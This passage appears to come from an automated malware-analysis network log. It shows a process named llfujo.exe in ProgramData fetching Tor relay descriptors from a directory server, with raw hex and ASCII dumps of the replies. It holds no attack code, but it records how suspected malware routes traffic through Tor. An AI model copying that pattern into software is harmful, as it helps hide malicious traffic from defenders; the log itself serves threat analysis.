4f 61 77 78 66 77 2b 70 6e 70 64 75 31 46 55 7a 2f 45 73 6e 2f 62 77 6f 3d 0a 2d 2d 2d 2d 2d 45 4e 44 20 45 44 32 35 35 31 39 20 43 45 52 54 2d 2d 2d 2d 2d 0a 6d 61 73 74 65 72 2d 6b 65 79 2d 65 64 32 35 35 31 39 20 37 68 56 4d 74 72 68 4d 36 6d 68 51 46 35 30 49 4b 49 50 57 62 36 67 45 30 70 39 64 71 35 4d 50 71 52 64 67 4c 2f 36 78 6e 72 6b 0a 70 6c 61 74 66 6f 72 6d 20 54 6f 72 20 30 2e 34 2e 38 2e 30 2d 61 6c 70 68 61 2d 64 65 76 20 6f 6e 20 4c 69 6e 75 78 0a 70 72 6f 74 6f 20 43 6f 6e 73 3d 31 2d 32 20 44 65 73 63 3d 31 2d 32 20 44 69 72 43 61 63 68 65 3d 32 20 46 6c 6f 77 43 74 72 6c 3d 31 2d 32 20 48 53 44 69 72 3d 32 20 48 53 49 6e 74 72 6f 3d 34 2d 35 20 48 53 52 65 6e 64 3d 31 2d 32 20 4c 69 6e 6b 3d 31 2d 35 20 4c 69 6e 6b 41 75 74 68 3d 31 2c 33 20 4d 69 63 72 6f 64 65 73 63 3d 31 2d 32 20 50 61 64 64 69 6e 67 3d 32 20 52 65 6c 61 79 3d 31 2d 34 0a 70 75 62 6c 69 73 68 65 64 20 32 30 32 33 2d 30 32 2d 30 38 20 31 31 3a 32 35 3a 31 37 0a 66 69 6e 67 65 72 70 72 69 6e 74 20 30 46 42 30 20 37 36 39 30 20 44 36 34 43 20 45 35 43 32 20 32 42 35 31 20 37 35 31 38 20 33 43 30 45 20 35 39 36 37 20 38 43 44 46 20 37 45 41 42 0a 75 70 74 69 6d 65 20 31 39 34 34 36 33 0a 62 61 6e 64 77 69 64 74 68 20 31 30 37 35 32 30 20 31 30 37 33 37 34 31 38 32 34 20 36 34 32 34 35 37 36 0a 65 78 74 72 61 2d 69 6e 66 6f 2d 64 69 67 65 73 74 20 46 31 43 36 39 42 46 33 30 42 30 45 34 43 35 44 30 34 41 31 44 30 41 46 44 33 31 46 37 30 31 39 30 32 37 33 37 44 38 32 20 32 75 78 43 66 70 53 55 4a 50 4c 62 59 67 63 43 31 79 63 48 4e 30 36 52 67 63 33 67 36 30 55 42 78 7a 56 4a 6c 69 55 37 4d 51 4d 0a 6f 6e 69 6f 6e 2d 6b 65 79 0a 2d 2d 2d 2d 2d 42 45 47 49 4e 20 52 53 41 20 50 55 42 4c 49 43 20 4b 45 59 2d 2d 2d 2d 2d 0a 4d 49 47 4a 41 6f 47 42 41 50 76 61 6f 56 75 54 4a 43 42 79 4a 79 66 39 2b 43 6a 4e 72 6e 46 55 78 4c 4f 6a 54 57 6d 62 52 77 31 70 67 31 30 78 55 65 35 50 70 4a 58 76 4f 2b 55 61 74 44 74 55 0a 32 68 54 4c 59 6c 59 58 49 76 50 69 58 6c 73 4e 35 38 54 59 58 30 55 68 6c 6c 72 51 66 32 34 48 52 65 68 41 45 41 6b 39 6c 67 57 69 38 72 64 49 55 30 36 74 39 7a 53 72 33 2b 42 5a 59 56 61 30 0a 34 4b 33 39 2b 69 41 71 36 66 44 7a 73 45 52 53 5a 33 54 37 37 36 52 59 48 34 50 46 31 4e 6f 77 4e 56 4e 55 30 50 33 73 59 70 37 7a 79 4e 74 79 59 39 6f 78 41 67 4d 42 41 41 45 3d 0a 2d 2d 2d 2d 2d 45 4e 44 20 52 53 41 20 50 55 42 4c 49 43 20 4b 45 59 2d 2d 2d 2d 2d 0a 73 69 67 6e 69 6e 67 2d 6b 65 79 0a 2d 2d 2d 2d 2d 42 45 47 49 4e 20 52 53 41 20 50 55 42 4c 49 43 20 4b 45 59 2d 2d 2d 2d 2d 0a 4d 49 47 4a 41 6f
                      Data Ascii: router INSRelay35at8443 140.78.100.35 8443 0 0identity-ed25519-----BEGIN ED25519 CERT-----AQQABxvaAbxr8j6uK5CvIaJKKtLO7ZoFHYvGcnhowcIB0rcTRbBgAQAgBADuFUy2uEzqaFAXnQgog9ZvqATSn12rkw+pF2Av/rGeuYGAxyzatpJYhMfQ/3tLj71Wq1lrIjQmnfPLrL3iwCD+MKpsV/4Ckr197X350AgOawxfw+pnpdu1FUz/Esn/bwo=-----END ED25519 CERT-----master-key-ed25519 7hVMtrhM6mhQF50IKIPWb6gE0p9dq5MPqRdgL/6xnrkplatform Tor 0.4.8.0-alpha-dev on Linuxproto Cons=1-2 Desc=1-2 DirCache=2 FlowCtrl=1-2 HSDir=2 HSIntro=4-5 HSRend=1-2 Link=1-5 LinkAuth=1,3 Microdesc=1-2 Padding=2 Relay=1-4published 2023-02-08 11:25:17fingerprint 0FB0 7690 D64C E5C2 2B51 7518 3C0E 5967 8CDF 7EABuptime 194463bandwidth 107520 1073741824 6424576extra-info-digest F1C69BF30B0E4C5D04A1D0AFD31F701902737D82 2uxCfpSUJPLbYgcC1ycHN06Rgc3g60UBxzVJliU7MQMonion-key-----BEGIN RSA PUBLIC KEY-----MIGJAoGBAPvaoVuTJCByJyf9+CjNrnFUxLOjTWmbRw1pg10xUe5PpJXvO+UatDtU2hTLYlYXIvPiXlsN58TYX0UhllrQf24HRehAEAk9lgWi8rdIU06t9zSr3+BZYVa04K39+iAq6fDzsERSZ3T776RYH4PF1NowNVNU0P3sYp7zyNtyY9oxAgMBAAE=-----END RSA PUBLIC KEY-----signing-key-----BEGIN RSA PUBLIC KEY-----MIGJAo


                      Session IDSource IPSource PortDestination IPDestination PortProcess
                      5192.168.2.549707116.203.195.429030C:\ProgramData\dtkttiw\llfujo.exe
                      TimestampkBytes transferredDirectionData
                      Feb 9, 2023 01:00:31.968424082 CET2628OUTGET /tor/server/fp/03000eddfeb7db6a4171d09d2df028ada6b27dee HTTP/1.0
                      Host: 116.203.195.42
                      User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0
                      Connection: close
                      Feb 9, 2023 01:00:31.990334034 CET2629INHTTP/1.0 200 OK
                      Date: Thu, 09 Feb 2023 00:00:31 GMT
                      Content-Type: text/plain
                      X-Your-Address-Is: 84.17.52.13
                      Content-Encoding: identity
                      Expires: Sat, 11 Feb 2023 00:00:31 GMT
                      Data Raw: 72 6f 75 74 65 72 20 4e 54 48 32 37 52 32 20 31 39 32 2e 34 32 2e 31 31 36 2e 31 37 39 20 39 30 30 31 20 30 20 30 0a 69 64 65 6e 74 69 74 79 2d 65 64 32 35 35 31 39 0a 2d 2d 2d 2d 2d 42 45 47 49 4e 20 45 44 32 35 35 31 39 20 43 45 52 54 2d 2d 2d 2d 2d 0a 41 51 51 41 42 78 7a 34 41 56 55 73 43 52 4b 48 6c 53 41 59 35 50 76 6a 4b 59 53 53 35 37 65 35 66 58 36 35 74 38 35 74 31 50 36 79 35 54 6b 72 64 54 6d 59 41 51 41 67 42 41 42 70 6d 5a 36 72 0a 77 33 32 6f 37 50 41 42 6c 5a 46 30 54 79 4a 4f 4c 32 67 5a 4e 72 6b 49 35 76 41 42 7a 36 30 48 36 67 61 70 62 7a 63 36 79 47 36 47 44 64 56 52 66 57 69 4c 39 59 51 63 35 71 36 7a 77 4c 49 49 0a 42 4a 53 74 49 39 38 4b 6d 50 6d 4c 6e 37 52 37 45 62 56 35 79 41 58 6c 55 38 6f 4b 66 53 61 2b 72 53 67 50 70 4b 67 6a 77 73 4f 74 74 4b 34 48 64 68 48 46 53 44 54 6c 78 67 30 3d 0a 2d 2d 2d 2d 2d 45 4e 44 20 45 44 32 35 35 31 39 20 43 45 52 54 2d 2d 2d 2d 2d 0a 6d 61 73 74 65 72 2d 6b 65 79 2d 65 64 32 35 35 31 39 20 61 5a 6d 65 71 38 4e 39 71 4f 7a 77 41 5a 57 52 64 45 38 69 54 69 39 6f 47 54 61 35 43 4f 62 77 41 63 2b 74 42 2b 6f 47 71 57 38 0a 70 6c 61 74 66 6f 72 6d 20 54 6f 72 20 30 2e 34 2e 37 2e 31 33 20 6f 6e 20 46 72 65 65 42 53 44 0a 70 72 6f 74 6f 20 43 6f 6e 73 3d 31 2d 32 20 44 65 73 63 3d 31 2d 32 20 44 69 72 43 61 63 68 65 3d 32 20 46 6c 6f 77 43 74 72 6c 3d 31 2d 32 20 48 53 44 69 72 3d 32 20 48 53 49 6e 74 72 6f 3d 34 2d 35 20 48 53 52 65 6e 64 3d 31 2d 32 20 4c 69 6e 6b 3d 31 2d 35 20 4c 69 6e 6b 41 75 74 68 3d 31 2c 33 20 4d 69 63 72 6f 64 65 73 63 3d 31 2d 32 20 50 61 64 64 69 6e 67 3d 32 20 52 65 6c 61 79 3d 31 2d 34 0a 70 75 62 6c 69 73 68 65 64 20 32 30 32 33 2d 30 32 2d 30 38 20 32 31 3a 30 37 3a 35 38 0a 66 69 6e 67 65 72 70 72 69 6e 74 20 30 33 30 30 20 30 45 44 44 20 46 45 42 37 20 44 42 36 41 20 34 31 37 31 20 44 30 39 44 20 32 44 46 30 20 32 38 41 44 20 41 36 42 32 20 37 44 45 45 0a 75 70 74 69 6d 65 20 32 38 30 33 32 35 0a 62 61 6e 64 77 69 64 74 68 20 31 30 34 38 35 37 36 30 30 20 31 39 36 36 30 38 30 30 30 20 38 36 34 31 38 39 32 0a 65 78 74 72 61 2d 69 6e 66 6f 2d 64 69 67 65 73 74 20 33 44 37 30 34 42 45 34 34 34 39 46 37 33 45 35 35 34 31 34 34 31 32 46 38 34 31 30 43 32 36 44 38 34 31 42 35 39 42 38 20 4a 47 55 41 2b 65 52 30 72 6b 68 70 6b 47 47 33 4f 65 73 38 2b 6f 38 57 48 36 61 68 5a 76 39 67 2f 2b 7a 51 55 30 63 6d 77 53 63 0a 6f 6e 69 6f 6e 2d 6b 65 79 0a 2d 2d 2d 2d 2d 42 45 47 49 4e 20 52 53 41 20 50 55 42 4c 49 43 20 4b 45 59 2d 2d 2d 2d 2d 0a 4d 49 47 4a 41 6f 47 42 41 4d 31 56 58 51 4a 57 7a 76 2f 46 64 47 66 4d 43 36 31 6c 67 58 68 42 35 70 4f 56 69 63 78 6d 72 35 4e 41 41 74 69 61 32 62 38 6f 4b 4d 43 71 68 32 44 59 41 55 71 36 0a 44 4d 5a 63 38 46 49 36 62 64 51 4f 43 62 41 64 35 2f 37 51 36 6e 4e 51 66 78 61 49 64 76 4c 61 6d 37 46 53 55 30 6f 52 79 4e 32 32 35 72 63 50 45 4d 74 58 6d 4c 49 32 54 4e 41 48 75 51 41 6e 0a 59 51 4e 57 48 47 33 34 78 7a 34 56 46 63 70 61 46 43 6b 53 32 6a 6c 38 42 39 79 4d 2f 4b 34 67 71 41 6f 4a 59 7a 65 6a 66 50 6d 49 38 30 6a 6d 51 49 4b 70 41 67 4d 42 41 41 45 3d 0a 2d 2d 2d 2d 2d 45 4e 44 20 52 53 41 20 50 55 42 4c 49 43 20 4b 45 59 2d 2d 2d 2d 2d 0a 73 69 67 6e 69 6e 67 2d 6b 65 79 0a 2d 2d 2d 2d 2d 42 45 47 49 4e 20 52 53 41 20 50 55 42 4c 49 43 20 4b 45 59 2d 2d 2d 2d 2d 0a 4d 49 47 4a 41 6f 47 42 41 4b 42 4b 2f 49 32 53 4e 32 34
                      Data Ascii: router NTH27R2 192.42.116.179 9001 0 0identity-ed25519-----BEGIN ED25519 CERT-----AQQABxz4AVUsCRKHlSAY5PvjKYSS57e5fX65t85t1P6y5TkrdTmYAQAgBABpmZ6rw32o7PABlZF0TyJOL2gZNrkI5vABz60H6gapbzc6yG6GDdVRfWiL9YQc5q6zwLIIBJStI98KmPmLn7R7EbV5yAXlU8oKfSa+rSgPpKgjwsOttK4HdhHFSDTlxg0=-----END ED25519 CERT-----master-key-ed25519 aZmeq8N9qOzwAZWRdE8iTi9oGTa5CObwAc+tB+oGqW8platform Tor 0.4.7.13 on FreeBSDproto Cons=1-2 Desc=1-2 DirCache=2 FlowCtrl=1-2 HSDir=2 HSIntro=4-5 HSRend=1-2 Link=1-5 LinkAuth=1,3 Microdesc=1-2 Padding=2 Relay=1-4published 2023-02-08 21:07:58fingerprint 0300 0EDD FEB7 DB6A 4171 D09D 2DF0 28AD A6B2 7DEEuptime 280325bandwidth 104857600 196608000 8641892extra-info-digest 3D704BE4449F73E55414412F8410C26D841B59B8 JGUA+eR0rkhpkGG3Oes8+o8WH6ahZv9g/+zQU0cmwSconion-key-----BEGIN RSA PUBLIC KEY-----MIGJAoGBAM1VXQJWzv/FdGfMC61lgXhB5pOVicxmr5NAAtia2b8oKMCqh2DYAUq6DMZc8FI6bdQOCbAd5/7Q6nNQfxaIdvLam7FSU0oRyN225rcPEMtXmLI2TNAHuQAnYQNWHG34xz4VFcpaFCkS2jl8B9yM/K4gqAoJYzejfPmI80jmQIKpAgMBAAE=-----END RSA PUBLIC KEY-----signing-key-----BEGIN RSA PUBLIC KEY-----MIGJAoGBAKBK/I2SN24


                      Session IDSource IPSource PortDestination IPDestination PortProcess
                      6192.168.2.549708116.203.195.429030C:\ProgramData\dtkttiw\llfujo.exe
                      TimestampkBytes transferredDirectionData
                      Feb 9, 2023 01:00:32.324678898 CET2640OUTGET /tor/server/fp/0fb07690d64ce5c22b5175183c0e59678cdf7eab HTTP/1.0
                      Host: 116.203.195.42
                      User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0
                      Connection: close
                      Feb 9, 2023 01:00:32.346796989 CET2641INHTTP/1.0 200 OK
                      Date: Thu, 09 Feb 2023 00:00:32 GMT
                      Content-Type: text/plain
                      X-Your-Address-Is: 84.17.52.13
                      Content-Encoding: identity
                      Expires: Sat, 11 Feb 2023 00:00:32 GMT
                      Data Raw: 72 6f 75 74 65 72 20 49 4e 53 52 65 6c 61 79 33 35 61 74 38 34 34 33 20 31 34 30 2e 37 38 2e 31 30 30 2e 33 35 20 38 34 34 33 20 30 20 30 0a 69 64 65 6e 74 69 74 79 2d 65 64 32 35 35 31 39 0a 2d 2d 2d 2d 2d 42 45 47 49 4e 20 45 44 32 35 35 31 39 20 43 45 52 54 2d 2d 2d 2d 2d 0a 41 51 51 41 42 78 76 61 41 62 78 72 38 6a 36 75 4b 35 43 76 49 61 4a 4b 4b 74 4c 4f 37 5a 6f 46 48 59 76 47 63 6e 68 6f 77 63 49 42 30 72 63 54 52 62 42 67 41 51 41 67 42 41 44 75 46 55 79 32 0a 75 45 7a 71 61 46 41 58 6e 51 67 6f 67 39 5a 76 71 41 54 53 6e 31 32 72 6b 77 2b 70 46 32 41 76 2f 72 47 65 75 59 47 41 78 79 7a 61 74 70 4a 59 68 4d 66 51 2f 33 74 4c 6a 37 31 57 71 31 6c 72 0a 49 6a 51 6d 6e 66 50 4c 72 4c 33 69 77 43 44 2b 4d 4b 70 73 56 2f 34 43 6b 72 31 39 37 58 33 35 30 41 67 4f 61 77 78 66 77 2b 70 6e 70 64 75 31 46 55 7a 2f 45 73 6e 2f 62 77 6f 3d 0a 2d 2d 2d 2d 2d 45 4e 44 20 45 44 32 35 35 31 39 20 43 45 52 54 2d 2d 2d 2d 2d 0a 6d 61 73 74 65 72 2d 6b 65 79 2d 65 64 32 35 35 31 39 20 37 68 56 4d 74 72 68 4d 36 6d 68 51 46 35 30 49 4b 49 50 57 62 36 67 45 30 70 39 64 71 35 4d 50 71 52 64 67 4c 2f 36 78 6e 72 6b 0a 70 6c 61 74 66 6f 72 6d 20 54 6f 72 20 30 2e 34 2e 38 2e 30 2d 61 6c 70 68 61 2d 64 65 76 20 6f 6e 20 4c 69 6e 75 78 0a 70 72 6f 74 6f 20 43 6f 6e 73 3d 31 2d 32 20 44 65 73 63 3d 31 2d 32 20 44 69 72 43 61 63 68 65 3d 32 20 46 6c 6f 77 43 74 72 6c 3d 31 2d 32 20 48 53 44 69 72 3d 32 20 48 53 49 6e 74 72 6f 3d 34 2d 35 20 48 53 52 65 6e 64 3d 31 2d 32 20 4c 69 6e 6b 3d 31 2d 35 20 4c 69 6e 6b 41 75 74 68 3d 31 2c 33 20 4d 69 63 72 6f 64 65 73 63 3d 31 2d 32 20 50 61 64 64 69 6e 67 3d 32 20 52 65 6c 61 79 3d 31 2d 34 0a 70 75 62 6c 69 73 68 65 64 20 32 30 32 33 2d 30 32 2d 30 38 20 31 31 3a 32 35 3a 31 37 0a 66 69 6e 67 65 72 70 72 69 6e 74 20 30 46 42 30 20 37 36 39 30 20 44 36 34 43 20 45 35 43 32 20 32 42 35 31 20 37 35 31 38 20 33 43 30 45 20 35 39 36 37 20 38 43 44 46 20 37 45 41 42 0a 75 70 74 69 6d 65 20 31 39 34 34 36 33 0a 62 61 6e 64 77 69 64 74 68 20 31 30 37 35 32 30 20 31 30 37 33 37 34 31 38 32 34 20 36 34 32 34 35 37 36 0a 65 78 74 72 61 2d 69 6e 66 6f 2d 64 69 67 65 73 74 20 46 31 43 36 39 42 46 33 30 42 30 45 34 43 35 44 30 34 41 31 44 30 41 46 44 33 31 46 37 30 31 39 30 32 37 33 37 44 38 32 20 32 75 78 43 66 70 53 55 4a 50 4c 62 59 67 63 43 31 79 63 48 4e 30 36 52 67 63 33 67 36 30 55 42 78 7a 56 4a 6c 69 55 37 4d 51 4d 0a 6f 6e 69 6f 6e 2d 6b 65 79 0a 2d 2d 2d 2d 2d 42 45 47 49 4e 20 52 53 41 20 50 55 42 4c 49 43 20 4b 45 59 2d 2d 2d 2d 2d 0a 4d 49 47 4a 41 6f 47 42 41 50 76 61 6f 56 75 54 4a 43 42 79 4a 79 66 39 2b 43 6a 4e 72 6e 46 55 78 4c 4f 6a 54 57 6d 62 52 77 31 70 67 31 30 78 55 65 35 50 70 4a 58 76 4f 2b 55 61 74 44 74 55 0a 32 68 54 4c 59 6c 59 58 49 76 50 69 58 6c 73 4e 35 38 54 59 58 30 55 68 6c 6c 72 51 66 32 34 48 52 65 68 41 45 41 6b 39 6c 67 57 69 38 72 64 49 55 30 36 74 39 7a 53 72 33 2b 42 5a 59 56 61 30 0a 34 4b 33 39 2b 69 41 71 36 66 44 7a 73 45 52 53 5a 33 54 37 37 36 52 59 48 34 50 46 31 4e 6f 77 4e 56 4e 55 30 50 33 73 59 70 37 7a 79 4e 74 79 59 39 6f 78 41 67 4d 42 41 41 45 3d 0a 2d 2d 2d 2d 2d 45 4e 44 20 52 53 41 20 50 55 42 4c 49 43 20 4b 45 59 2d 2d 2d 2d 2d 0a 73 69 67 6e 69 6e 67 2d 6b 65 79 0a 2d 2d 2d 2d 2d 42 45 47 49 4e 20 52 53 41 20 50 55 42 4c 49 43 20 4b 45 59 2d 2d 2d 2d 2d 0a 4d 49 47 4a 41 6f
                      Data Ascii: router INSRelay35at8443 140.78.100.35 8443 0 0identity-ed25519-----BEGIN ED25519 CERT-----AQQABxvaAbxr8j6uK5CvIaJKKtLO7ZoFHYvGcnhowcIB0rcTRbBgAQAgBADuFUy2uEzqaFAXnQgog9ZvqATSn12rkw+pF2Av/rGeuYGAxyzatpJYhMfQ/3tLj71Wq1lrIjQmnfPLrL3iwCD+MKpsV/4Ckr197X350AgOawxfw+pnpdu1FUz/Esn/bwo=-----END ED25519 CERT-----master-key-ed25519 7hVMtrhM6mhQF50IKIPWb6gE0p9dq5MPqRdgL/6xnrkplatform Tor 0.4.8.0-alpha-dev on Linuxproto Cons=1-2 Desc=1-2 DirCache=2 FlowCtrl=1-2 HSDir=2 HSIntro=4-5 HSRend=1-2 Link=1-5 LinkAuth=1,3 Microdesc=1-2 Padding=2 Relay=1-4published 2023-02-08 11:25:17fingerprint 0FB0 7690 D64C E5C2 2B51 7518 3C0E 5967 8CDF 7EABuptime 194463bandwidth 107520 1073741824 6424576extra-info-digest F1C69BF30B0E4C5D04A1D0AFD31F701902737D82 2uxCfpSUJPLbYgcC1ycHN06Rgc3g60UBxzVJliU7MQMonion-key-----BEGIN RSA PUBLIC KEY-----MIGJAoGBAPvaoVuTJCByJyf9+CjNrnFUxLOjTWmbRw1pg10xUe5PpJXvO+UatDtU2hTLYlYXIvPiXlsN58TYX0UhllrQf24HRehAEAk9lgWi8rdIU06t9zSr3+BZYVa04K39+iAq6fDzsERSZ3T776RYH4PF1NowNVNU0P3sYp7zyNtyY9oxAgMBAAE=-----END RSA PUBLIC KEY-----signing-key-----BEGIN RSA PUBLIC KEY-----MIGJAo


                      Session IDSource IPSource PortDestination IPDestination PortProcess
                      7192.168.2.549709116.203.195.429030C:\ProgramData\dtkttiw\llfujo.exe
                      TimestampkBytes transferredDirectionData
                      Feb 9, 2023 01:00:32.467812061 CET2647OUTGET /tor/server/fp/1efbaccd28a07fd6ad7aa6f1293177d71397e918 HTTP/1.0
                      Host: 116.203.195.42
                      User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0
                      Connection: close
                      Feb 9, 2023 01:00:32.690979004 CET2648INHTTP/1.0 200 OK
                      Date: Thu, 09 Feb 2023 00:00:32 GMT
                      Content-Type: text/plain
                      X-Your-Address-Is: 84.17.52.13
                      Content-Encoding: identity
                      Expires: Sat, 11 Feb 2023 00:00:32 GMT
                      Data Raw: 72 6f 75 74 65 72 20 63 62 31 38 32 30 20 31 34 34 2e 37 36 2e 33 2e 31 38 32 20 39 30 39 30 20 30 20 30 0a 69 64 65 6e 74 69 74 79 2d 65 64 32 35 35 31 39 0a 2d 2d 2d 2d 2d 42 45 47 49 4e 20 45 44 32 35 35 31 39 20 43 45 52 54 2d 2d 2d 2d 2d 0a 41 51 51 41 42 78 76 50 41 53 38 52 65 36 58 31 53 65 66 4a 64 48 42 64 4d 53 63 62 32 6d 74 57 46 63 36 74 75 6e 46 49 72 4b 63 4d 54 54 6c 57 69 2f 49 46 41 51 41 67 42 41 43 6b 51 4b 35 4e 0a 55 49 2f 69 6a 4c 2f 45 37 34 68 66 56 37 6e 34 6f 38 30 6b 41 44 6c 69 47 66 4b 55 30 5a 57 32 79 34 38 4d 65 6b 53 48 6a 43 75 48 33 74 6f 69 5a 56 48 42 6c 34 4a 66 6b 6a 50 67 7a 68 76 51 0a 32 6d 72 67 30 41 6a 42 67 4c 33 76 69 64 33 53 72 54 71 47 75 72 46 46 6f 5a 2f 2b 58 35 75 37 64 56 70 49 44 43 61 31 30 35 4b 6f 78 6f 38 68 36 73 2b 5a 6c 67 63 35 4c 67 30 3d 0a 2d 2d 2d 2d 2d 45 4e 44 20 45 44 32 35 35 31 39 20 43 45 52 54 2d 2d 2d 2d 2d 0a 6d 61 73 74 65 72 2d 6b 65 79 2d 65 64 32 35 35 31 39 20 70 45 43 75 54 56 43 50 34 6f 79 2f 78 4f 2b 49 58 31 65 35 2b 4b 50 4e 4a 41 41 35 59 68 6e 79 6c 4e 47 56 74 73 75 50 44 48 6f 0a 6f 72 2d 61 64 64 72 65 73 73 20 5b 32 61 30 31 3a 34 66 38 3a 31 39 30 3a 37 33 38 35 3a 3a 32 5d 3a 39 30 39 30 0a 70 6c 61 74 66 6f 72 6d 20 54 6f 72 20 30 2e 34 2e 37 2e 31 30 20 6f 6e 20 4c 69 6e 75 78 0a 70 72 6f 74 6f 20 43 6f 6e 73 3d 31 2d 32 20 44 65 73 63 3d 31 2d 32 20 44 69 72 43 61 63 68 65 3d 32 20 46 6c 6f 77 43 74 72 6c 3d 31 2d 32 20 48 53 44 69 72 3d 32 20 48 53 49 6e 74 72 6f 3d 34 2d 35 20 48 53 52 65 6e 64 3d 31 2d 32 20 4c 69 6e 6b 3d 31 2d 35 20 4c 69 6e 6b 41 75 74 68 3d 31 2c 33 20 4d 69 63 72 6f 64 65 73 63 3d 31 2d 32 20 50 61 64 64 69 6e 67 3d 32 20 52 65 6c 61 79 3d 31 2d 34 0a 70 75 62 6c 69 73 68 65 64 20 32 30 32 33 2d 30 32 2d 30 38 20 31 38 3a 35 37 3a 32 31 0a 66 69 6e 67 65 72 70 72 69 6e 74 20 31 45 46 42 20 41 43 43 44 20 32 38 41 30 20 37 46 44 36 20 41 44 37 41 20 41 36 46 31 20 32 39 33 31 20 37 37 44 37 20 31 33 39 37 20 45 39 31 38 0a 75 70 74 69 6d 65 20 31 34 33 36 31 30 37 33 0a 62 61 6e 64 77 69 64 74 68 20 31 30 37 33 37 34 31 38 32 34 20 31 30 37 33 37 34 31 38 32 34 20 34 31 30 33 33 39 38 30 0a 65 78 74 72 61 2d 69 6e 66 6f 2d 64 69 67 65 73 74 20 30 35 31 45 38 32 31 35 34 35 45 44 34 38 38 41 31 36 41 34 37 31 37 35 34 46 44 45 42 32 44 46 41 41 33 46 34 45 38 42 20 54 4a 6b 44 53 4b 36 4e 4b 55 6a 73 45 5a 5a 58 38 2b 35 39 54 41 2f 4a 4d 78 2f 74 73 50 72 76 56 68 54 2b 31 48 66 51 6d 7a 30 0a 6f 6e 69 6f 6e 2d 6b 65 79 0a 2d 2d 2d 2d 2d 42 45 47 49 4e 20 52 53 41 20 50 55 42 4c 49 43 20 4b 45 59 2d 2d 2d 2d 2d 0a 4d 49 47 4a 41 6f 47 42 41 4c 6b 44 4c 4a 57 4a 35 76 61 77 44 6e 67 59 69 34 46 45 61 6f 70 43 45 62 67 2b 35 77 75 41 74 56 59 4c 59 31 57 41 6d 71 55 4f 4e 2f 38 68 42 42 57 72 41 75 45 46 0a 50 2f 38 70 75 38 61 31 75 39 2f 42 52 31 50 58 46 57 6b 75 39 75 30 36 39 50 37 76 75 34 62 4d 45 57 35 49 69 6f 4a 43 45 37 39 49 5a 41 6c 4b 58 44 56 61 6a 49 61 7a 4e 51 30 35 36 6b 54 33 0a 42 37 39 57 65 6c 52 35 6e 52 7a 62 51 2f 52 68 31 37 50 47 61 47 49 68 76 59 4c 37 5a 68 2b 6b 58 2b 33 45 32 64 41 44 4d 48 2b 69 61 6a 6f 43 57 66 62 50 41 67 4d 42 41 41 45 3d 0a 2d 2d 2d 2d 2d 45 4e 44 20 52 53 41 20 50 55 42 4c 49 43 20 4b 45 59 2d 2d 2d 2d 2d 0a 73 69 67 6e 69 6e 67 2d 6b 65 79 0a 2d 2d 2d 2d 2d 42 45 47 49 4e 20
                      Data Ascii: router cb1820 144.76.3.182 9090 0 0identity-ed25519-----BEGIN ED25519 CERT-----AQQABxvPAS8Re6X1SefJdHBdMScb2mtWFc6tunFIrKcMTTlWi/IFAQAgBACkQK5NUI/ijL/E74hfV7n4o80kADliGfKU0ZW2y48MekSHjCuH3toiZVHBl4JfkjPgzhvQ2mrg0AjBgL3vid3SrTqGurFFoZ/+X5u7dVpIDCa105Koxo8h6s+Zlgc5Lg0=-----END ED25519 CERT-----master-key-ed25519 pECuTVCP4oy/xO+IX1e5+KPNJAA5YhnylNGVtsuPDHoor-address [2a01:4f8:190:7385::2]:9090platform Tor 0.4.7.10 on Linuxproto Cons=1-2 Desc=1-2 DirCache=2 FlowCtrl=1-2 HSDir=2 HSIntro=4-5 HSRend=1-2 Link=1-5 LinkAuth=1,3 Microdesc=1-2 Padding=2 Relay=1-4published 2023-02-08 18:57:21fingerprint 1EFB ACCD 28A0 7FD6 AD7A A6F1 2931 77D7 1397 E918uptime 14361073bandwidth 1073741824 1073741824 41033980extra-info-digest 051E821545ED488A16A471754FDEB2DFAA3F4E8B TJkDSK6NKUjsEZZX8+59TA/JMx/tsPrvVhT+1HfQmz0onion-key-----BEGIN RSA PUBLIC KEY-----MIGJAoGBALkDLJWJ5vawDngYi4FEaopCEbg+5wuAtVYLY1WAmqUON/8hBBWrAuEFP/8pu8a1u9/BR1PXFWku9u069P7vu4bMEW5IioJCE79IZAlKXDVajIazNQ056kT3B79WelR5nRzbQ/Rh17PGaGIhvYL7Zh+kX+3E2dADMH+iajoCWfbPAgMBAAE=-----END RSA PUBLIC KEY-----signing-key-----BEGIN


                      Session IDSource IPSource PortDestination IPDestination PortProcess
                      8192.168.2.549710116.203.195.429030C:\ProgramData\dtkttiw\llfujo.exe
                      TimestampkBytes transferredDirectionData
                      Feb 9, 2023 01:00:32.933310032 CET2654OUTGET /tor/server/fp/0fb07690d64ce5c22b5175183c0e59678cdf7eab HTTP/1.0
                      Host: 116.203.195.42
                      User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0
                      Connection: close
                      Feb 9, 2023 01:00:32.955236912 CET2656INHTTP/1.0 200 OK
                      Date: Thu, 09 Feb 2023 00:00:32 GMT
                      Content-Type: text/plain
                      X-Your-Address-Is: 84.17.52.13
                      Content-Encoding: identity
                      Expires: Sat, 11 Feb 2023 00:00:32 GMT
                      Data Raw: 72 6f 75 74 65 72 20 49 4e 53 52 65 6c 61 79 33 35 61 74 38 34 34 33 20 31 34 30 2e 37 38 2e 31 30 30 2e 33 35 20 38 34 34 33 20 30 20 30 0a 69 64 65 6e 74 69 74 79 2d 65 64 32 35 35 31 39 0a 2d 2d 2d 2d 2d 42 45 47 49 4e 20 45 44 32 35 35 31 39 20 43 45 52 54 2d 2d 2d 2d 2d 0a 41 51 51 41 42 78 76 61 41 62 78 72 38 6a 36 75 4b 35 43 76 49 61 4a 4b 4b 74 4c 4f 37 5a 6f 46 48 59 76 47 63 6e 68 6f 77 63 49 42 30 72 63 54 52 62 42 67 41 51 41 67 42 41 44 75 46 55 79 32 0a 75 45 7a 71 61 46 41 58 6e 51 67 6f 67 39 5a 76 71 41 54 53 6e 31 32 72 6b 77 2b 70 46 32 41 76 2f 72 47 65 75 59 47 41 78 79 7a 61 74 70 4a 59 68 4d 66 51 2f 33 74 4c 6a 37 31 57 71 31 6c 72 0a 49 6a 51 6d 6e 66 50 4c 72 4c 33 69 77 43 44 2b 4d 4b 70 73 56 2f 34 43 6b 72 31 39 37 58 33 35 30 41 67 4f 61 77 78 66 77 2b 70 6e 70 64 75 31 46 55 7a 2f 45 73 6e 2f 62 77 